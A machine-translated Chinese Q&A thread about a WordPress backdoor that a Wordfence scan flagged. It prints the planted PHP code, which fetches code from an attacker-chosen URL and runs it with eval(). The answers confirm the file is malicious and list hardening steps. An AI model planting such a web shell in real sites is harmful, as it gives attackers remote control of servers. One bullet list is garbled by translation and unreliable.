Wordpress警告-后门:PHP/Digic.rce.8527

Question

今天早上，我在我的网站上查看了Wordfence扫描结果，并看到17个似乎意味着恶意软件已经安装在服务器上的实例。如果是这样，我会感到惊讶，但我想确定：

举个例子，

文件名: wp-admin/menu-header-cron.php文件类型:不是来自wordpress.org的核心、主题或插件文件。详细信息:此文件似乎是由黑客安装或修改以执行恶意活动。如果您知道此文件，您可以选择忽略它，以排除它在未来的扫描。这个文件中匹配的文本是：

问题类型是:后门:PHP/dicic.rce.8527描述:远程代码执行恶意软件

查看该文件，该文件的内容如下：

<?php
if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));
}

有人能确认这是一个无辜的文件还是我需要隔离/删除的东西？

另外，这个文件是创建的吗？它意味着远程代码具有在wp/ sub文件夹中创建新文件的能力？是否有一种简单的方法来防止这种情况发生，从而排除任何进一步的情况。

非常感谢您的帮助。

Answer 1

答案：

1. 是的，正如@Everlyn已经提到的那样，这是一个危险的文件。eval()在生产中被认为是不安全的。

为了进一步验证，在最新的Wordpress包的源文件上，一个快速的grep "isset($_GET['limit'])"告诉我们它不是它的一部分，因此也是一个危险的代码。

1. 是的，有人可以在您的服务器上上传文件。可能他们上传了某种形式的web，并可以操纵您的托管帐户上的任何文件。不过，这很常见。

为了防止将来发生这种情况(考虑到您已经成功地清理了当前WP安装)，您可以做一些事情(这里有很多文章，所以它是多余的)，但是在这里提到一些可能不会有坏处：。

在服务器级别上安装或启用plugins.

• Simple，

• 总是确保您有最新的Wordpress以及插件，

• 使用最小的

• ，但有效:更改wp和主题文件夹的位置。(https://wordpress.org/support/article/editing-wp-config-php/#moving-wp-content-folder )

如果您检查常规WP安装的访问日志，您会注意到有大量的机器人使用已知的漏洞--大多数是针对插件文件夹的漏洞，简单地改变插件文件夹的位置以及上面提到的其他安全措施可以显著减少此类攻击。

Answer 2

这个片段正在读取限制参数，然后传递作为一个URL来获取一个文件。而eval函数将只执行它

所以它是漂亮的危险